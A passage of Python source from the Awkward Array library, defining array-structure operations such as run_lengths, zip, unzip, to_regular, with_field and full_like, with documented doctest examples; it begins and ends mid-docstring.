<Array [[1.1, 2.2, 3.3], None, [7.7]] type='3 * option[var * float64]'>
"""
layout = ak.operations.convert.to_layout(
array, allow_record=False, allow_other=False
)
out = layout.num(axis=axis)
return ak._util.maybe_wrap_like(out, array, behavior, highlevel)
def run_lengths(array, highlevel=True, behavior=None):
"""
Args:
array: Data containing runs of numbers to count.
highlevel (bool): If True, return an #ak.Array; otherwise, return
a low-level #ak.layout.Content subclass.
behavior (None or dict): Custom #ak.behavior for the output array, if
high-level.
Computes the lengths of sequences of identical values at the deepest level
of nesting, returning an array with the same structure but with `int64` type.
For example,
>>> array = ak.Array([1.1, 1.1, 1.1, 2.2, 3.3, 3.3, 4.4, 4.4, 5.5])
>>> ak.run_lengths(array)
<Array [3, 1, 2, 2, 1] type='5 * int64'>
There are 3 instances of 1.1, followed by 1 instance of 2.2, 2 instances of 3.3,
2 instances of 4.4, and 1 instance of 5.5.
The order and uniqueness of the input data doesn't matter,
>>> array = ak.Array([1.1, 1.1, 1.1, 5.5, 4.4, 4.4, 1.1, 1.1, 5.5])
>>> ak.run_lengths(array)
<Array [3, 1, 2, 2, 1] type='5 * int64'>
just the difference between each value and its neighbors.
The data can be nested, but runs don't cross list boundaries.
>>> array = ak.Array([[1.1, 1.1, 1.1, 2.2, 3.3], [3.3, 4.4], [4.4, 5.5]])
>>> ak.run_lengths(array)
<Array [[3, 1, 1], [1, 1], [1, 1]] type='3 * var * int64'>
This function recognizes strings as distinguishable values.
>>> array = ak.Array([["one", "one"], ["one", "two", "two"], ["three", "two", "two"]])
>>> ak.run_lengths(array)
<Array [[2], [1, 2], [1, 2]] type='3 * var * int64'>
Note that this can be combined with #ak.argsort and #ak.unflatten to compute
a "group by" operation:
>>> array = ak.Array([{"x": 1, "y": 1.1}, {"x": 2, "y": 2.2}, {"x": 1, "y": 1.1},
... {"x": 3, "y": 3.3}, {"x": 1, "y": 1.1}, {"x": 2, "y": 2.2}])
>>> sorted = array[ak.argsort(array.x)]
>>> sorted.x
<Array [1, 1, 1, 2, 2, 3] type='6 * int64'>
>>> ak.run_lengths(sorted.x)
<Array [3, 2, 1] type='3 * int64'>
>>> ak.unflatten(sorted, ak.run_lengths(sorted.x)).tolist()
[[{'x': 1, 'y': 1.1}, {'x': 1, 'y': 1.1}, {'x': 1, 'y': 1.1}],
[{'x': 2, 'y': 2.2}, {'x': 2, 'y': 2.2}],
[{'x': 3, 'y': 3.3}]]
Unlike a database "group by," this operation can be applied in bulk to many sublists
(though the run lengths need to be fully flattened to be used as `counts` for
#ak.unflatten, and you need to specify `axis=-1` as the depth).
>>> array = ak.Array([[{"x": 1, "y": 1.1}, {"x": 2, "y": 2.2}, {"x": 1, "y": 1.1}],
... [{"x": 3, "y": 3.3}, {"x": 1, "y": 1.1}, {"x": 2, "y": 2.2}]])
>>> sorted = array[ak.argsort(array.x)]
>>> sorted.x
<Array [[1, 1, 2], [1, 2, 3]] type='2 * var * int64'>
>>> ak.run_lengths(sorted.x)
<Array [[2, 1], [1, 1, 1]] type='2 * var * int64'>
>>> counts = ak.flatten(ak.run_lengths(sorted.x), axis=None)
>>> ak.unflatten(sorted, counts, axis=-1).tolist()
[[[{'x': 1, 'y': 1.1}, {'x': 1, 'y': 1.1}],
[{'x': 2, 'y': 2.2}]],
[[{'x': 1, 'y': 1.1}],
[{'x': 2, 'y': 2.2}],
[{'x': 3, 'y': 3.3}]]]
See also #ak.num, #ak.argsort, #ak.unflatten.
"""
nplike = ak.nplike.of(array)
def lengths_of(data, offsets):
if len(data) == 0:
return nplike.empty(0, np.int64), offsets
else:
diffs = data[1:] != data[:-1]
if isinstance(diffs, ak.highlevel.Array):
diffs = nplike.asarray(diffs)
if offsets is not None:
diffs[offsets[1:-1] - 1] = True
positions = nplike.nonzero(diffs)[0]
full_positions = nplike.empty(len(positions) + 2, np.int64)
full_positions[0] = 0
full_positions[-1] = len(data)
full_positions[1:-1] = positions + 1
nextcontent = full_positions[1:] - full_positions[:-1]
if offsets is None:
nextoffsets = None
else:
nextoffsets = nplike.searchsorted(full_positions, offsets, side="left")
return nextcontent, nextoffsets
def getfunction(layout):
if layout.branch_depth == (False, 1):
if isinstance(layout, ak._util.indexedtypes):
layout = layout.project()
if (
layout.parameter("__array__") == "string"
or layout.parameter("__array__") == "bytestring"
):
nextcontent, _ = lengths_of(ak.highlevel.Array(layout), None)
return lambda: ak.layout.NumpyArray(nextcontent)
if not isinstance(layout, (ak.layout.NumpyArray, ak.layout.EmptyArray)):
raise NotImplementedError(
"run_lengths on "
+ type(layout).__name__
+ ak._util.exception_suffix(__file__)
)
nextcontent, _ = lengths_of(nplike.asarray(layout), None)
return lambda: ak.layout.NumpyArray(nextcontent)
elif layout.branch_depth == (False, 2):
if isinstance(layout, ak._util.indexedtypes):
layout = layout.project()
if not isinstance(layout, ak._util.listtypes):
raise NotImplementedError(
"run_lengths on "
+ type(layout).__name__
+ ak._util.exception_suffix(__file__)
)
if (
layout.content.parameter("__array__") == "string"
or layout.content.parameter("__array__") == "bytestring"
):
listoffsetarray = layout.toListOffsetArray64(False)
offsets = nplike.asarray(listoffsetarray.offsets)
content = listoffsetarray.content[offsets[0] : offsets[-1]]
if isinstance(content, ak._util.indexedtypes):
content = content.project()
nextcontent, nextoffsets = lengths_of(
ak.highlevel.Array(content), offsets - offsets[0]
)
return lambda: ak.layout.ListOffsetArray64(
ak.layout.Index64(nextoffsets), ak.layout.NumpyArray(nextcontent)
)
listoffsetarray = layout.toListOffsetArray64(False)
offsets = nplike.asarray(listoffsetarray.offsets)
content = listoffsetarray.content[offsets[0] : offsets[-1]]
if isinstance(content, ak._util.indexedtypes):
content = content.project()
if not isinstance(content, (ak.layout.NumpyArray, ak.layout.EmptyArray)):
raise NotImplementedError(
"run_lengths on "
+ type(layout).__name__
+ " with content "
+ type(content).__name__
+ ak._util.exception_suffix(__file__)
)
nextcontent, nextoffsets = lengths_of(
nplike.asarray(content), offsets - offsets[0]
)
return lambda: ak.layout.ListOffsetArray64(
ak.layout.Index64(nextoffsets), ak.layout.NumpyArray(nextcontent)
)
else:
return None
layout = ak.operations.convert.to_layout(
array, allow_record=False, allow_other=False
)
if isinstance(layout, ak.partition.PartitionedArray):
if len(layout.partitions) != 0 and layout.partitions[0].branch_depth == (
False,
1,
):
out = ak._util.recursively_apply(
layout.toContent(),
getfunction,
pass_depth=False,
pass_user=False,
)
else:
outparts = []
for part in layout.partitions:
outparts.append(
ak._util.recursively_apply(
part,
getfunction,
pass_depth=False,
pass_user=False,
)
)
out = ak.partition.IrregularlyPartitionedArray(outparts)
else:
out = ak._util.recursively_apply(
layout,
getfunction,
pass_depth=False,
pass_user=False,
)
return ak._util.maybe_wrap_like(out, array, behavior, highlevel)
def zip(
arrays,
depth_limit=None,
parameters=None,
with_name=None,
highlevel=True,
behavior=None,
right_broadcast=False,
):
"""
Args:
arrays (dict or iterable of arrays): Arrays to combine into a
record-containing structure (if a dict) or a tuple-containing
structure (if any other kind of iterable).
depth_limit (None or int): If None, attempt to fully broadcast the
`array` to all levels. If an int, limit the number of dimensions
that get broadcasted. The minimum value is `1`, for no
broadcasting.
parameters (None or dict): Parameters for the new
#ak.layout.RecordArray node that is created by this operation.
with_name (None or str): Assigns a `"__record__"` name to the new
#ak.layout.RecordArray node that is created by this operation
(overriding `parameters`, if necessary).
highlevel (bool): If True, return an #ak.Array; otherwise, return
a low-level #ak.layout.Content subclass.
behavior (None or dict): Custom #ak.behavior for the output array, if
high-level.
right_broadcast (bool): If True, follow rules for implicit
right-broadcasting, as described in #ak.broadcast_arrays.
Combines `arrays` into a single structure as the fields of a collection
of records or the slots of a collection of tuples. If the `arrays` have
nested structure, they are broadcasted with one another to form the
records or tuples as deeply as possible, though this can be limited by
`depth_limit`.
This operation may be thought of as the opposite of projection in
#ak.Array.__getitem__, which extracts fields one at a time, or
#ak.unzip, which extracts them all in one call.
Consider the following arrays, `one` and `two`.
>>> one = ak.Array([[1.1, 2.2, 3.3], [], [4.4, 5.5], [6.6]])
>>> two = ak.Array([["a", "b", "c"], [], ["d", "e"], ["f"]])
Zipping them together using a dict creates a collection of records with
the same nesting structure as `one` and `two`.
>>> ak.to_list(ak.zip({"x": one, "y": two}))
[
[{'x': 1.1, 'y': 'a'}, {'x': 2.2, 'y': 'b'}, {'x': 3.3, 'y': 'c'}],
[],
[{'x': 4.4, 'y': 'd'}, {'x': 5.5, 'y': 'e'}],
[{'x': 6.6, 'y': 'f'}]
]
Doing so with a list creates tuples, whose fields are not named.
>>> ak.to_list(ak.zip([one, two]))
[
[(1.1, 'a'), (2.2, 'b'), (3.3, 'c')],
[],
[(4.4, 'd'), (5.5, 'e')],
[(6.6, 'f')]
]
Adding a third array with the same length as `one` and `two` but less
internal structure is okay: it gets broadcasted to match the others.
(See #ak.broadcast_arrays for broadcasting rules.)
>>> three = ak.Array([100, 200, 300, 400])
>>> ak.to_list(ak.zip([one, two, three]))
[
[[(1.1, 97, 100)], [(2.2, 98, 100)], [(3.3, 99, 100)]],
[],
[[(4.4, 100, 300)], [(5.5, 101, 300)]],
[[(6.6, 102, 400)]]
]
However, if arrays have the same depth but different lengths of nested
lists, attempting to zip them together is a broadcasting error.
>>> one = ak.Array([[[1, 2, 3], [], [4, 5], [6]], [], [[7, 8]]])
>>> two = ak.Array([[[1.1, 2.2], [3.3], [4.4], [5.5]], [], [[6.6]]])
>>> ak.zip([one, two])
ValueError: in ListArray64, cannot broadcast nested list
For this, one can set the `depth_limit` to prevent the operation from
attempting to broadcast what can't be broadcasted.
>>> ak.to_list(ak.zip([one, two], depth_limit=1))
[([[1, 2, 3], [], [4, 5], [6]], [[1.1, 2.2], [3.3], [4.4], [5.5]]),
([], []),
([[7, 8]], [[6.6]])]
As an extreme, `depth_limit=1` is a handy way to make a record structure
at the outermost level, regardless of whether the fields have matching
structure or not.
"""
if depth_limit is not None and depth_limit <= 0:
raise ValueError(
"depth_limit must be None or at least 1"
+ ak._util.exception_suffix(__file__)
)
if isinstance(arrays, dict):
behavior = ak._util.behaviorof(*arrays.values(), behavior=behavior)
recordlookup = []
layouts = []
num_scalars = 0
for n, x in arrays.items():
recordlookup.append(n)
try:
layout = ak.operations.convert.to_layout(
x, allow_record=False, allow_other=False
)
except TypeError:
num_scalars += 1
layout = ak.operations.convert.to_layout(
[x], allow_record=False, allow_other=False
)
layouts.append(layout)
else:
behavior = ak._util.behaviorof(*arrays, behavior=behavior)
recordlookup = None
layouts = []
num_scalars = 0
for x in arrays:
try:
layout = ak.operations.convert.to_layout(
x, allow_record=False, allow_other=False
)
except TypeError:
num_scalars += 1
layout = ak.operations.convert.to_layout(
[x], allow_record=False, allow_other=False
)
layouts.append(layout)
to_record = num_scalars == len(arrays)
if with_name is not None:
if parameters is None:
parameters = {}
else:
parameters = dict(parameters)
parameters["__record__"] = with_name
def getfunction(inputs, depth):
if depth_limit == depth or (
depth_limit is None
and all(
x.purelist_depth == 1
or (
x.purelist_depth == 2
and x.purelist_parameter("__array__")
in ("string", "bytestring", "categorical")
)
for x in inputs
)
):
return lambda: (
ak.layout.RecordArray(inputs, recordlookup, parameters=parameters),
)
else:
return None
out = ak._util.broadcast_and_apply(
layouts,
getfunction,
behavior,
right_broadcast=right_broadcast,
pass_depth=True,
)
assert isinstance(out, tuple) and len(out) == 1
out = out[0]
if to_record:
out = out[0]
assert isinstance(out, ak.layout.Record)
return ak._util.maybe_wrap(out, behavior, highlevel)
def unzip(array):
"""
If the `array` contains tuples or records, this operation splits them
into a Python tuple of arrays, one for each field.
If the `array` does not contain tuples or records, the single `array`
is placed in a length 1 Python tuple.
For example,
>>> array = ak.Array([{"x": 1.1, "y": [1]},
... {"x": 2.2, "y": [2, 2]},
... {"x": 3.3, "y": [3, 3, 3]}])
>>> x, y = ak.unzip(array)
>>> x
<Array [1.1, 2.2, 3.3] type='3 * float64'>
>>> y
<Array [[1], [2, 2], [3, 3, 3]] type='3 * var * int64'>
"""
fields = ak.operations.describe.fields(array)
if len(fields) == 0:
return (array,)
else:
return tuple(array[n] for n in fields)
def to_regular(array, axis=1, highlevel=True, behavior=None):
"""
Args:
array: Array to convert.
axis (int): The dimension at which this operation is applied. The
outermost dimension is `0`, followed by `1`, etc., and negative
values count backward from the innermost: `-1` is the innermost
dimension, `-2` is the next level up, etc.
highlevel (bool): If True, return an #ak.Array; otherwise, return
a low-level #ak.layout.Content subclass.
behavior (None or dict): Custom #ak.behavior for the output array, if
high-level.
Converts a variable-length axis into a regular one, if possible.
>>> irregular = ak.from_iter(np.arange(2*3*5).reshape(2, 3, 5))
>>> ak.type(irregular)
2 * var * var * int64
>>> ak.type(ak.to_regular(irregular))
2 * 3 * var * int64
>>> ak.type(ak.to_regular(irregular, axis=2))
2 * var * 5 * int64
>>> ak.type(ak.to_regular(irregular, axis=-1))
2 * var * 5 * int64
But truly irregular data cannot be converted.
>>> ak.to_regular(ak.Array([[1, 2, 3], [], [4, 5]]))
ValueError: in ListOffsetArray64, cannot convert to RegularArray because
subarray lengths are not regular
See also #ak.from_regular.
"""
def getfunction(layout, depth, posaxis):
posaxis = layout.axis_wrap_if_negative(posaxis)
if posaxis == depth and isinstance(layout, ak.layout.RegularArray):
return lambda: layout
elif posaxis == depth and isinstance(layout, ak._util.listtypes):
return lambda: layout.toRegularArray()
elif posaxis == 0:
raise ValueError(
"array has no axis {0}".format(axis)
+ ak._util.exception_suffix(__file__)
)
else:
return posaxis
out = ak.operations.convert.to_layout(array)
if axis != 0:
out = ak._util.recursively_apply(
out,
getfunction,
pass_depth=True,
pass_user=True,
user=axis,
numpy_to_regular=True,
)
return ak._util.maybe_wrap_like(out, array, behavior, highlevel)
def from_regular(array, axis=1, highlevel=True, behavior=None):
"""
Args:
array: Array to convert.
axis (int): The dimension at which this operation is applied. The
outermost dimension is `0`, followed by `1`, etc., and negative
values count backward from the innermost: `-1` is the innermost
dimension, `-2` is the next level up, etc.
highlevel (bool): If True, return an #ak.Array; otherwise, return
a low-level #ak.layout.Content subclass.
behavior (None or dict): Custom #ak.behavior for the output array, if
high-level.
Converts a regular axis into an irregular one.
>>> regular = ak.Array(np.arange(2*3*5).reshape(2, 3, 5))
>>> ak.type(regular)
2 * 3 * 5 * int64
>>> ak.type(ak.from_regular(regular))
2 * var * 5 * int64
>>> ak.type(ak.from_regular(regular, axis=2))
2 * 3 * var * int64
>>> ak.type(ak.from_regular(regular, axis=-1))
2 * 3 * var * int64
See also #ak.to_regular.
"""
def getfunction(layout, depth, posaxis):
posaxis = layout.axis_wrap_if_negative(posaxis)
if posaxis == depth and isinstance(layout, ak.layout.RegularArray):
return lambda: layout.toListOffsetArray64(False)
elif posaxis == depth and isinstance(layout, ak._util.listtypes):
return lambda: layout
elif posaxis == 0:
raise ValueError(
"array has no axis {0}".format(axis)
+ ak._util.exception_suffix(__file__)
)
else:
return posaxis
out = ak.operations.convert.to_layout(array)
if axis != 0:
out = ak._util.recursively_apply(
out,
getfunction,
pass_depth=True,
pass_user=True,
user=axis,
numpy_to_regular=True,
)
return ak._util.maybe_wrap_like(out, array, behavior, highlevel)
def with_name(array, name, highlevel=True, behavior=None):
"""
Args:
base: Data containing records or tuples.
name (str): Name to give to the records or tuples; this assigns
the `"__record__"` parameter.
highlevel (bool): If True, return an #ak.Array; otherwise, return
a low-level #ak.layout.Content subclass.
behavior (None or dict): Custom #ak.behavior for the output array, if
high-level.
Returns an #ak.Array or #ak.Record (or low-level equivalent, if
`highlevel=False`) with a new name. This function does not change the
array in-place.
The records or tuples may be nested within multiple levels of nested lists.
If records are nested within records, only the outermost are affected.
Setting the `"__record__"` parameter makes it possible to add behaviors
to the data; see #ak.Array and #ak.behavior for a more complete
description.
"""
def getfunction(layout):
if isinstance(layout, ak.layout.RecordArray):
parameters = dict(layout.parameters)
parameters["__record__"] = name
return lambda: ak.layout.RecordArray(
layout.contents,
layout.recordlookup,
len(layout),
layout.identities,
parameters,
)
else:
return None
out = ak._util.recursively_apply(
ak.operations.convert.to_layout(array), getfunction, pass_depth=False
)
def getfunction2(layout):
if isinstance(layout, ak._util.uniontypes):
return lambda: layout.simplify(merge=True, mergebool=False)
else:
return None
out2 = ak._util.recursively_apply(out, getfunction2, pass_depth=False)
return ak._util.maybe_wrap_like(out2, array, behavior, highlevel)
def with_field(base, what, where=None, highlevel=True, behavior=None):
"""
Args:
base: Data containing records or tuples.
what: Data to add as a new field.
where (None or str or non-empy iterable of str): If None, the new field
has no name (can be accessed as an integer slot number in a
string); If str, the name of the new field. If iterable, it is
interpreted as a path where to add the field in a nested record.
highlevel (bool): If True, return an #ak.Array; otherwise, return
a low-level #ak.layout.Content subclass.
behavior (None or dict): Custom #ak.behavior for the output array, if
high-level.
Returns an #ak.Array or #ak.Record (or low-level equivalent, if
`highlevel=False`) with a new field attached. This function does not
change the array in-place.
See #ak.Array.__setitem__ and #ak.Record.__setitem__ for a variant that
changes the high-level object in-place. (These methods internally use
#ak.with_field, so performance is not a factor in choosing one over the
other.)
"""
if isinstance(what, (ak.highlevel.Array, ak.highlevel.Record)):
what_caches = what.caches # noqa: F841
if not (
where is None
or isinstance(where, str)
or (isinstance(where, Iterable) and all(isinstance(x, str) for x in where))
):
raise TypeError(
"New fields may only be assigned by field name(s) "
"or as a new integer slot by passing None for 'where'"
+ ak._util.exception_suffix(__file__)
)
if (
not isinstance(where, str)
and isinstance(where, Iterable)
and all(isinstance(x, str) for x in where)
and len(where) > 1
):
return with_field(
base,
with_field(
base[where[0]],
what,
where=where[1:],
highlevel=highlevel,
behavior=behavior,
),
where=where[0],
highlevel=highlevel,
behavior=behavior,
)
else:
if not (isinstance(where, str) or where is None):
where = where[0]
behavior = ak._util.behaviorof(base, what, behavior=behavior)
base = ak.operations.convert.to_layout(
base, allow_record=True, allow_other=False
)
if base.numfields < 0:
raise ValueError(
"no tuples or records in array; cannot add a new field"
+ ak._util.exception_suffix(__file__)
)
what = ak.operations.convert.to_layout(
what, allow_record=True, allow_other=True
)
keys = base.keys()
if where in base.keys():
keys.remove(where)
if len(keys) == 0:
# the only key was removed, so just create new Record
out = (ak.layout.RecordArray([what], [where], parameters=base.parameters),)
else:
def getfunction(inputs):
nplike = ak.nplike.of(*inputs)
base, what = inputs
if isinstance(base, ak.layout.RecordArray):
if what is None:
what = ak.layout.IndexedOptionArray64(
ak.layout.Index64(nplike.full(len(base), -1, np.int64)),
ak.layout.EmptyArray(),
)
elif not isinstance(what, ak.layout.Content):
what = ak.layout.NumpyArray(nplike.repeat(what, len(base)))
if base.istuple and where is None:
recordlookup = None
elif base.istuple:
recordlookup = keys + [where]
elif where is None:
recordlookup = keys + [str(len(keys))]
else:
recordlookup = keys + [where]
out = ak.layout.RecordArray(
[base[k] for k in keys] + [what],
recordlookup,
parameters=base.parameters,
)
return lambda: (out,)
else:
return None
out = ak._util.broadcast_and_apply(
[base, what],
getfunction,
behavior,
right_broadcast=False,
pass_depth=False,
)
assert isinstance(out, tuple) and len(out) == 1
return ak._util.maybe_wrap(out[0], behavior, highlevel)
def with_parameter(array, parameter, value, highlevel=True, behavior=None):
"""
Args:
array: Data convertible into an Awkward Array.
parameter (str): Name of the parameter to set on that array.
value (JSON): Value of the parameter to set on that array.
highlevel (bool): If True, return an #ak.Array; otherwise, return
a low-level #ak.layout.Content subclass.
behavior (None or dict): Custom #ak.behavior for the output array, if
high-level.
This function returns a new array with a parameter set on the outermost
node of its #ak.Array.layout.
Note that a "new array" is a lightweight shallow copy, not a duplication
of large data buffers.
You can also remove a single parameter with this function, since setting
a parameter to None is equivalent to removing it.
"""
layout = ak.operations.convert.to_layout(
array, allow_record=True, allow_other=False
)
if isinstance(layout, ak.partition.PartitionedArray):
out = layout.replace_partitions(
x.withparameter(parameter, value) for x in layout.partitions
)
else:
out = layout.withparameter(parameter, value)
return ak._util.maybe_wrap_like(out, array, behavior, highlevel)
def without_parameters(array, highlevel=True, behavior=None):
"""
Args:
array: Data convertible into an Awkward Array.
highlevel (bool): If True, return an #ak.Array; otherwise, return
a low-level #ak.layout.Content subclass.
behavior (None or dict): Custom #ak.behavior for the output array, if
high-level.
This function returns a new array without any parameters in its
#ak.Array.layout, on nodes of any level of depth.
Note that a "new array" is a lightweight shallow copy, not a duplication
of large data buffers.
"""
layout = ak.operations.convert.to_layout(
array, allow_record=True, allow_other=False
)
out = ak._util.recursively_apply(
layout, lambda layout: None, pass_depth=False, keep_parameters=False
)
return ak._util.maybe_wrap_like(out, array, behavior, highlevel)
_ZEROS = object()
@ak._connect._numpy.implements("zeros_like")
def zeros_like(array, highlevel=True, behavior=None, dtype=None):
"""
Args:
array: Array to use as a model for a replacement that contains only `0`.
highlevel (bool, default is True): If True, return an #ak.Array;
otherwise, return a low-level #ak.layout.Content subclass.
behavior (None or dict): Custom #ak.behavior for the output array, if
high-level.
dtype (None or type): Overrides the data type of the result.
This is the equivalent of NumPy's `np.zeros_like` for Awkward Arrays.
See #ak.full_like for details, and see also #ak.ones_like.
(There is no equivalent of NumPy's `np.empty_like` because Awkward Arrays
are immutable.)
"""
if dtype is not None:
return full_like(array, 0, highlevel=highlevel, behavior=behavior, dtype=dtype)
return full_like(array, _ZEROS, highlevel=highlevel, behavior=behavior, dtype=dtype)
@ak._connect._numpy.implements("ones_like")
def ones_like(array, highlevel=True, behavior=None, dtype=None):
"""
Args:
array: Array to use as a model for a replacement that contains only `1`.
highlevel (bool, default is True): If True, return an #ak.Array;
otherwise, return a low-level #ak.layout.Content subclass.
behavior (None or dict): Custom #ak.behavior for the output array, if
high-level.
dtype (None or type): Overrides the data type of the result.
This is the equivalent of NumPy's `np.ones_like` for Awkward Arrays.
See #ak.full_like for details, and see also #ak.zeros_like.
(There is no equivalent of NumPy's `np.empty_like` because Awkward Arrays
are immutable.)
"""
return full_like(array, 1, highlevel=highlevel, behavior=behavior, dtype=dtype)
@ak._connect._numpy.implements("full_like")
def full_like(array, fill_value, highlevel=True, behavior=None, dtype=None):
"""
Args:
array: Array to use as a model for a replacement that contains only
`fill_value`.
fill_value: Value to fill new new array with.
highlevel (bool, default is True): If True, return an #ak.Array;
otherwise, return a low-level #ak.layout.Content subclass.
behavior (None or dict): Custom #ak.behavior for the output array, if
high-level.
dtype (None or type): Overrides the data type of the result.
This is the equivalent of NumPy's `np.full_like` for Awkward Arrays.
Although it's possible to produce an array of `fill_value` with the structure
of an `array` using #ak.broadcast_arrays:
>>> array = ak.Array([[1, 2, 3], [], [4, 5]])
>>> ak.broadcast_arrays(array, 1)
[<Array [[1, 2, 3], [], [4, 5]] type='3 * var * int64'>,
<Array [[1, 1, 1], [], [1, 1]] type='3 * var * int64'>]
>>> ak.broadcast_arrays(array, 1.0)
[<Array [[1, 2, 3], [], [4, 5]] type='3 * var * int64'>,
<Array [[1, 1, 1], [], [1, 1]] type='3 * var * float64'>]
Such a technique takes its type from the scalar (`1` or `1.0`), rather than
the array. This function gets all types from the array, which might not be
the same in all parts of the structure.
Here is an extreme example:
>>> array = ak.Array([
... [{"x": 0.0, "y": []},
... {"x": 1.1, "y": [1]},
... {"x": 2.2, "y": [1, 2]}],
... [],
... [{"x": 3.3, "y": [1, 2, None, 3]},
... False,
... False,
... True,
... {"x": 4.4, "y": [1, 2, None, 3, 4]}]])
>>> ak.to_list(ak.full_like(array, 12.3))
[[{"x": 12.3, "y": []},
{"x": 12.3, "y": [12]},
{"x": 12.3, "y": [12, 12]}],
[],
[{"x": 12.3, "y": [12, 12, None, 12]},
True,
True,
True,
{"x": 12.3, "y": [12, 12, None, 12, 12]}]]
The `"x"` values get filled in with `12.3` because they retain their type
(`float64`) and the `"y"` list items get filled in with `12` because they
retain their type (`int64`). Booleans get filled with True because `12.3`
is not zero. Missing values remain in the same positions as in the original
`array`. (To fill them in, use #ak.fill_none.)
See also #ak.zeros_like and #ak.ones_like.
(There is no equivalent of NumPy's `np.empty_like` because Awkward Arrays
are immutable.)
"""
if dtype is not None:
# In the case of strings and byte strings,
# converting the fill avoids a ValueError.
fill_value = dtype(fill_value)
# Also, if the fill_value cannot be converted to the dtype
# this should throw a clear, early, error.
if dtype is bool:
# then for bools, only 0 and 1 give correct string behavior
fill_value = int(fill_value)
layout = ak.operations.convert.to_layout(
array, allow_record=True, allow_other=False
)
def getfunction(layout):
if layout.parameter("__array__") == "bytestring" and fill_value is _ZEROS:
nplike = ak.nplike.of(layout)
asbytes = nplike.frombuffer(b"", dtype=np.uint8)
return lambda: ak.layout.ListArray64(
ak.layout.Index64(nplike.zeros(len(layout), dtype=np.int64)),
ak.layout.Index64(nplike.zeros(len(layout), dtype=np.int64)),
ak.layout.NumpyArray(asbytes, parameters={"__array__": "byte"}),
parameters={"__array__": "bytestring"},
)
elif layout.parameter("__array__") == "bytestring":
nplike = ak.nplike.of(layout)
if isinstance(fill_value, bytes):
asbytes = fill_value
elif isinstance(fill_value, str) or (
ak._util.py27 and isinstance(fill_value, ak._util.unicode)
):
asbytes = fill_value.encode("utf-8", "surrogateescape")
else:
asbytes = str(fill_value).encode("utf-8", "surrogateescape")
asbytes = nplike.frombuffer(asbytes, dtype=np.uint8)
return lambda: ak.layout.ListArray64(
ak.layout.Index64(nplike.zeros(len(layout), dtype=np.int64)),
ak.layout.Index64(
nplike.full(len(layout), len(asbytes), dtype=np.int64)
),
ak.layout.NumpyArray(asbytes, parameters={"__array__": "byte"}),
parameters={"__array__": "bytestring"},
)
elif layout.parameter("__array__") == "string" and fill_value is _ZEROS:
nplike = ak.nplike.of(layout)
asbytes = nplike.frombuffer(b"", dtype=np.uint8)
return lambda: ak.layout.ListArray64(
ak.layout.Index64(nplike.zeros(len(layout), dtype=np.int64)),
ak.layout.Index64(nplike.zeros(len(layout), dtype=np.int64)),
ak.layout.NumpyArray(asbytes, parameters={"__array__": "char"}),
parameters={"__array__": "string"},
)
elif layout.parameter("__array__") == "string":
nplike = ak.nplike.of(layout)
asstr = str(fill_value).encode("utf-8", "surrogateescape")
asbytes = nplike.frombuffer(asstr, dtype=np.uint8)
return lambda: ak.layout.ListArray64(
ak.layout.Index64(nplike.zeros(len(layout), dtype=np.int64)),
ak.layout.Index64(
nplike.full(len(layout), len(asbytes), dtype=np.int64)
),
ak.layout.NumpyArray(asbytes, parameters={"__array__": "char"}),
parameters={"__array__": "string"},
)
elif isinstance(layout, ak.layout.NumpyArray):
nplike = ak.nplike.of(layout)
original = nplike.asarray(layout)
if fill_value == 0 or fill_value is _ZEROS:
return lambda: ak.layout.NumpyArray(
nplike.zeros_like(original),
layout.identities,
layout.parameters,
)
elif fill_value == 1:
return lambda: ak.layout.NumpyArray(
nplike.ones_like(original),
layout.identities,
layout.parameters,
)
else:
return lambda: ak.layout.NumpyArray(
nplike.full_like(original, fill_value),
layout.identities,
layout.parameters,
)
else:
return None
out = ak._util.recursively_apply(layout, getfunction, pass_depth=False)
if dtype is not None:
out = strings_astype(out, dtype)
out = values_astype(out, dtype)
return ak._util.maybe_wrap_like(out, array, behavior, highlevel)
@ak._connect._numpy.implements("broadcast_arrays")
def broadcast_arrays(*arrays, **kwargs):
"""
Args:
arrays: Arrays to broadcast into the same structure.
left_broadcast (bool): If True, follow rules for implicit
left-broadcasting, as described below.
right_broadcast (bool): If True, follow rules for implicit
right-broadcasting, as described below.
highlevel (bool, default is True): If True, return an #ak.Array;
otherwise, return a low-level #ak.layout.Content subclass.
Like NumPy's
[broadcast_arrays](https://docs.scipy.org/doc/numpy/reference/generated/numpy.broadcast_arrays.html)
function, this function returns the input `arrays` with enough elements
duplicated that they can be combined element-by-element.
For NumPy arrays, this means that scalars are replaced with arrays with
the same scalar value repeated at every element of the array, and regular
dimensions are created to increase low-dimensional data into
high-dimensional data.
For example,
>>> ak.broadcast_arrays(5,
... [1, 2, 3, 4, 5])
[<Array [5, 5, 5, 5, 5] type='5 * int64'>,
<Array [1, 2, 3, 4, 5] type='5 * int64'>]
and
>>> ak.broadcast_arrays(np.array([1, 2, 3]),
... np.array([[0.1, 0.2, 0.3], [10, 20, 30]]))
[<Array [[ 1, 2, 3], [ 1, 2, 3]] type='2 * 3 * int64'>,
<Array [[0.1, 0.2, 0.3], [10, 20, 30]] type='2 * 3 * float64'>]
Note that in the second example, when the `3 * int64` array is expanded
to match the `2 * 3 * float64` array, it is the deepest dimension that
is aligned. If we try to match a `2 * int64` with the `2 * 3 * float64`,
>>> ak.broadcast_arrays(np.array([1, 2]),
... np.array([[0.1, 0.2, 0.3], [10, 20, 30]]))
ValueError: cannot broadcast RegularArray of size 2 with RegularArray of size 3
NumPy has the same behavior: arrays with different numbers of dimensions
are aligned to the right before expansion. One can control this by
explicitly adding a new axis (reshape to add a dimension of length 1)
where the expansion is supposed to take place because a dimension of
length 1 can be expanded like a scalar.
>>> ak.broadcast_arrays(np.array([1, 2])[:, np.newaxis],
... np.array([[0.1, 0.2, 0.3], [10, 20, 30]]))
[<Array [[ 1, 1, 1], [ 2, 2, 2]] type='2 * 3 * int64'>,
<Array [[0.1, 0.2, 0.3], [10, 20, 30]] type='2 * 3 * float64'>]
Again, NumPy does the same thing (`np.newaxis` is equal to None, so this
trick is often shown with None in the slice-tuple). Where the broadcasting
happens can be controlled, but numbers of dimensions that don't match are
implicitly aligned to the right (fitting innermost structure, not
outermost).
While that might be an arbitrary decision for rectilinear arrays, it is
much more natural for implicit broadcasting to align left for tree-like
structures. That is, the root of each data structure should agree and
leaves may be duplicated to match. For example,
>>> ak.broadcast_arrays([ 100, 200, 300],
... [[1.1, 2.2, 3.3], [], [4.4, 5.5]])
[<Array [[100, 100, 100], [], [300, 300]] type='3 * var * int64'>,
<Array [[1.1, 2.2, 3.3], [], [4.4, 5.5]] type='3 * var * float64'>]
One typically wants single-item-per-element data to be duplicated to
match multiple-items-per-element data. Operations on the broadcasted
arrays like
